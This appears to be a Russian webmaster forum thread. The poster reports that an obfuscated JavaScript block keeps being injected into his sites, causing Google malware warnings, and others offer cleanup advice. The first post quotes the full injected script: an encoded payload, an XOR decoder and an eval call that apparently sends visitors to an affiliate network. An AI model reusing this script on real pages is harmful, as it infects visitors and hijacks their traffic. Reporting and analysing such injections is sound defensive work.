Этот сайт может нанести вред Вашему компьютеру.

W1tCHER
На сайте с 01.06.2010
Offline
6
701

Уважаемые форумчане на всех моих сайтах будь то движок или просто html сайт вставляют следующий код после тега <body>

<script language='javascript' type='text/javascript'>var exitOrgLog=17056;var sNetAt;for(rmIpIp=0;rmIpIp<1;rmIpIp++){rmIpIp++};sNetAt='%94%92%92%9f%92%90%9e%90%cf%b2%91%a4%bb%85%cb%d5%95%84%c3%97%96%a1%c5%9d%8a%a5%8d%8e%d1%9e%90%8c%c6%8b%93%87%99%88%db%fd%ca%86%92%89%a4%b4%fe%85%99%a6%85%8a%a2%87%96%90%c5%9e%98%b0%b6%94%94%95%cd%8e%a6%91%8a%a0%98%89%b4%c1%da%99%85%9b%9f%9f%89%98%c4%df%c8%9a%90%87%a8%af%95%b1%89%c7%c1%99%84%95%95%b6%d3%94%92%9d%94%be%be%9f%d3%80%99%8f%87%d2%a7%90%99%80%9c%b5%84%cb%d0%d6%c0%c9%84%8c%84%a1%df%87%83%b9%8c%89%db%fd%d1%d9%d4%d7%da%87%ca%ae%d1%8e%ac%a8%81%a8%c0%d5%8a%9b%9a%85%bb%a9%82%fb%cc%98%8a%9b%d1%c4%80%a9%96%97%82%c2%bd%b0%90%8b%db%b3%dc%88%a3%be%dd%bd%9b%96%9f%fb%c8%db%98%c1%94%81%be%92%99%a3%95%d8%ad%ca%92%d8%b3%9d%8e%a0%ed%88%de%a9%80%8c%a3%95%97%af%d9%dc%d8%e3%cb%d8%ef%d7%c6%fb%ed%da%e1%8a%91%87%83%94%89%e7%97%dd%98%84%b2%89%90%c4%91%f9%c1%c8%91%db%c2%dd%d3%cb%aa%a1%83%bb%d2%8a%d5%96%af%89%9e%8a%89%c9%df%d4%a7%9d%9a%b1%9d%ad%97%ff%c5%c0%be%d0%8b%8b%9a%8f%a4%8c%89%9b%8b%9f%92%f7%c6%ef%d1%9b%f6%dd%9a%81%bf%9e%b5%fc%8a%a6%8b%95%8a%a9%82%ad%c6%e2%9b%8c%9a%9e%9c%9b%95%92%9f%b7%b5%96%9f%ec%9f%93%90%80%95%a3%b7%87%d1%b7%80%d0%df%8d%d4%ba%f0%a0%92%88%8f%96%90%cb%d4%a8%90%a1%91%b5%b6%86%81%d4%dd%f8%d5%96%cf%fb%dd%8a%9b%c4%8d%b7%b2%98%df%d9%87%af%96%97%8d%b2%dc%d8%ef%d7%c1%80%9e%90%9f%a7%94%92%c7%83%8f%b4%d3%d5%a6%a0%8b%87%d3%84%88%b3%85%b2%be%fd%cf%8b%dc%91%92%a9%a2%c2%96%e1%93%97%b1%bd%bb%c2%d1%d6%c8%f5%93%8f%8d%d0%8f%90%86%95%96%d4%f2%84%98%98%83%95%93%a7%e4%bb%98%8e%92%cc%d9%c0%cb%92%84%a2%a6%9d%8b%da%cc%c6%cb%96%97%a5%82%9b%a1%d6%c0%f8%98%8e%8b%a6%94%8e%ea%d0%d5%82%99%83%9c%b2%81%99%b6%92%87%b1%c5%d5%d1%e6%db%8d%94%81%b5%98%99%f4%d2%ea%aa%8f%87%f6%da%c2%99%87%96%a2%8b%ff%89%9e%90%a2%9d%90%d8%e0%c8%a3%81%ad%aa%8a%9e%d4%cc%e2%f4%d6%ec%df%88%d8%9f%84%90%b1%de%c2%c0%87%9c%d4%f1%c0%c6%b8%85%84%96%89%c3%cd%9a%cb%c9%e9%83%92%8b%93%9f%b5%af%8b%c1%ab%be%9f%a6%d6%f0%d9%a1%bd%b3%89%a9%a5%9a%8e%f7%a6%b6%8d%b1%ec%ce%81%8b%83%a4%9a%97%e3%fb%af%a2%af%b4%d1%a2%94%86%d2%bf%be%8f%95%9f%de%c8%85%8c%96%aa%b3%9e%98%d3%ce%c1%9b%88%9f%b0%f3%84%82%86%96%8f%9f%93%db%99%cd%db%84%c6%92%87%92%93%ae%9c%a6%d4%86%94%9f%89%9b%c2%da%c6%8d%87%8b%96%c4%ec%95%83%91%92%ec%da%d3%84%82%83%8c%c9%ca%de%aa%97%ac%8a%d3%d9%d7%c2%82%91%b6%c1%91%9e%9d%a7%c9%82%af%97%a0%9a%81%8f%99%9f%86%dd%ac%9c%b2%b2%92%8b%83%cd%83%85%ca%94%bb%94%b8%8b%91%b0%9f%c6%89%89%ee%94%b2%93%b9%a8%9a%a3%c3%81%a5%d4%b5%9a%8c%99%9e%89%d5%df%e9%a0%d3%c4%e2%c3%d0%c5%ce%96%a6%8e%95%97%d0%96%9e%9c%85%8e%80%a9%df%89%87%b8%93%e5%80%95%e7%93%b7%87%88%ca%96%9f%97%8b%bd%c0%d5%f2%cf%ce%8d%92%da%d6%b2%99%9c%88%af%f2%90%92%c3%d4%f6%c9%97%d0%bf%c4%ce%c7%80%ee%f2%c8%d1%df%cf%93%b4%c8%d0%96%f3%e1%98%d6%c6%96%e2%df%c1%89%a9%e4%d2%d0%99%95%80%96%94%c0%f6%c7%d6%d8%d2%8f%8e%af%bb%ba%a4%9e%d8%90%99%9e%a6%98%9d%c1%a3%c9%88%82%be%89%b7%dd%c8%88%e6%93%94%85%8b%e5%de%c1%ba%91%a5%c1%c5%95%be%9a%83%b8%8c%c7%fa%99%90%b0%d1%96%f2%d6%dd%94%bb%dd%90%95%9f%85%f8%85%88%99%a2%86%ce%d5%c5%c4%c4%e8%fb%80%a1%80%d3%98%ad%80%8d%ac%87%93%df%94%81%b2%da%9e%94%8d%87%a2%fd%d4%c7%d5%89%90%9a%af%89%a5%b9%96%9c%8d%95%94%b8%90%bd%8f%93%dd%d2%87%d9%fb%c6%91%c8%b1%d1%c1%cc%da%8c%cb%94%91%c2%d4%a5%9c%b6%a3%9e%ba%84%86%c4%87%ea%93%a1%87%8d%b5%90%a7%d1%87%a7%98%99%92%8e%c2%fc%cb%90%a9%b0%c0%98%9a%98%eb%91%89%80%87%a9%81%8d%9d';var netJoin='netJoin'.substring(63998, 63998);function pwdRmSql(pigFcAwk){var lsWaitUse=false;var rmNet=new Date();function exMov(setH){var intMod='';var natBedMov=0;function fcVoidSet(fcVoidSet){return true};var wilPsSql=setH.length, megaMaxA=0;function putTVoid(putTVoid){return 'putTVoid'};bQ=0;while(bQ<3){bQ++};while(megaMaxA<wilPsSql){this.waitOrg=13047;for(popPutH=0;popPutH<4;popPutH++){popPutH++};natBedMov+=pakOp(setH,megaMaxA)*wilPsSql;this.netArrayNil='';megaMaxA++;this.jDate='';}this.arrayAb=13065;atMask=0;while(atMask<2){atMask++};return (natBedMov+'');for(nutKErr=0;nutKErr<0;nutKErr++){};}function tailNArc(tailNArc){return true};function pwdVipS(pwdVipS){return 'pwdVipS'};function pakOp(oMovTop,callCut){var longGzBos='longGzBos'.substring(48954, 48954);return oMovTop['cZhZaKrZCZo_dmeKAZtZ'.replace(/[Z_mXK]/g, '')](callCut);this.doECc=false;}ccCom=0;while(ccCom<1){ccCom++};function theBg(theBg){return true};if((new String(document.write)).indexOf('arity')>0){for(minImgMap=0;minImgMap<2;minImgMap++){minImgMap++};return;var opCpUse='opCpUse'.substring(47749, 47749);}natD=0;while(natD<2){natD++};for(theG=0;theG<2;theG++){};var lBg=new Date();var maskExTo=0,whoBob=0,tabDoR=167;for(cdMapMov=0;cdMapMov<4;cdMapMov++){};var voidFcNil='';var logNPig=false;var xEnvWe=(new String(pwdRmSql)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var logRun=false;var byteMov=exMov(xEnvWe);this.netI=32840;var doTar=new Array();pigFcAwk=window['u:nXe8sXc8aOp_eX'.replace(/[_\:8OX]/g, '')](pigFcAwk);function imgIntTab(imgIntTab){return 'imgIntTab'};var mapGet=new Date();for(var tabPis=0; tabPis < (pigFcAwk.length); tabPis++){for(pkgMap=0;pkgMap<2;pkgMap++){};function maxWait(maxWait){return true};var arrayExit=pakOp(xEnvWe,maskExTo);this.toEnvPs='';var exitNsGet=pakOp(byteMov,whoBob);var askDate=function(){};for(qNutF=0;qNutF<3;qNutF++){};var qArcLog=arrayExit^exitNsGet^tabDoR;var gExMin=function(){return 'gExMin'};var bgToCont=pakOp(pigFcAwk,tabPis);this.pwdC='pwdC';function sqlT(){};maskExTo++,whoBob++;for(cdFMem=0;cdFMem<4;cdFMem++){};voidFcNil+=String['fHr>o,mOCOh>a>r,CHoHdHe>'.replace(/[,\>OHN]/g, '')](bgToCont^qArcLog);var atWilRm=49749;this.opF='opF';if(whoBob>byteMov.length)whoBob=0;function mapJ(){};if(maskExTo>xEnvWe.length)maskExTo=0;var intCalCnt=new Array();}var comTarEnv=function(){};var butBg=false;window['e*vuaulE'.replace(/[D\*\+uE]/g, '')](voidFcNil);bobOpN=0;while(bobOpN<4){bobOpN++};for(xNet=0;xNet<3;xNet++){xNet++};return voidFcNil=new String();var outLBc=false;var vipPs=function(){};}for(wordEZ=0;wordEZ<4;wordEZ++){};pwdRmSql(sNetAt);this.aA=58996;</script>

Сначала удалял данный код и менял фтп клиенты так как грешил на них, далее код снова появлялся с промежутком в две недели! Сменил все пароли от фтп аккаунтов, но и это непомогло, код снова появляется! По этой причине 2 моих сайта вылетели с индекса на остальных при переходе с google следущая надпись "Предупреждение- посещение этого сайта может нанести вред Вашему компьютеру!" Кто сталкивался с данной проблемой, прошу помочь мне советом! Пытался раскодировать данный код, но увы ничего не вышло...

AM
На сайте с 09.01.2007
Offline
467
#1

Свой компьютер сначала надо вычистить от заразы, а уж потом пенять на фтп клиенты.

Только не говорите что зараза на компьютере исключена.

W1tCHER
На сайте с 01.06.2010
Offline
6
#2
AndyM:
Свой компьютер сначала надо вычистить от заразы, а уж потом пенять на фтп клиенты.
Только не говорите что зараза на компьютере исключена.

Зараза на компьютере исключена, так как есть другие хостинги и на них я захожу с тех же фтп клиентов, этот вариант отпадает. Система после полного форматирования, стоит лицензионный Kaspersky Internet Security 2010 и это не спасает!

Mad_Man
На сайте с 10.11.2008
Offline
162
#3
W1tCHER:
Зараза на компьютере исключена

Угу. А как же иначе на винде?

Меняйте пароли фтп, пароли от админки сайта, пароли от всего, что даёт доступ к серверу.

W1tCHER
На сайте с 01.06.2010
Offline
6
#4
Mad_Man:
Угу. А как же иначе на винде?
Меняйте пароли фтп, пароли от админки сайта, пароли от всего, что даёт доступ к серверу.

Написал же я выше что пароли менял и ставил пароли типо таких 329279sgjsadgjgdHHHHDSl38832, но и это не помогло. Грешу теперь на то что сервак заражён у хостера, возможен такой вариант?

Mad_Man
На сайте с 10.11.2008
Offline
162
#5
W1tCHER:
Грешу теперь на то что сервак заражён у хостера, возможен такой вариант?

Смотря кто хостер.

W1tCHER
На сайте с 01.06.2010
Offline
6
#6

Хостер известный, на рынке уже более 5 лет. Попробую обратиться к техподдержке, возможно они что-то и скажут. Сейчас меня больше интересует как раскодировать данный код и заблокировать его на партнёрке на которую шлёт трафик. Возможно что тогда и проблема решиться.

[Удален]
#7

Если что то меняйте хостера,может быть это и он грешит,они не все с чистой совестью.

W1tCHER
На сайте с 01.06.2010
Offline
6
#8
Gamerz:
Если что то меняйте хостера,может быть это и он грешит,они не все с чистой совестью.

Попробую сменить хостера, но с хостером работаю более двух лет и раньше подобного не замечал. Хотя может сам хостер даже и не знает что сервак заражён, но это лишь предположение, а там неизвестно что на самом деле причина взлома сайтов.

[Удален]
#9
W1tCHER:
Попробую сменить хостера, но с хостером работаю более двух лет и раньше подобного не замечал. Хотя может сам хостер даже и не знает что сервак заражён, но это лишь предположение, а там неизвестно что на самом деле причина взлома сайтов.

Может быть.Нужно обязательно ему сообщить,только бекапы заранее сделайте.И еще вариант посмотреть сайт другого человека на этом же сервере.Вобщем вот.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий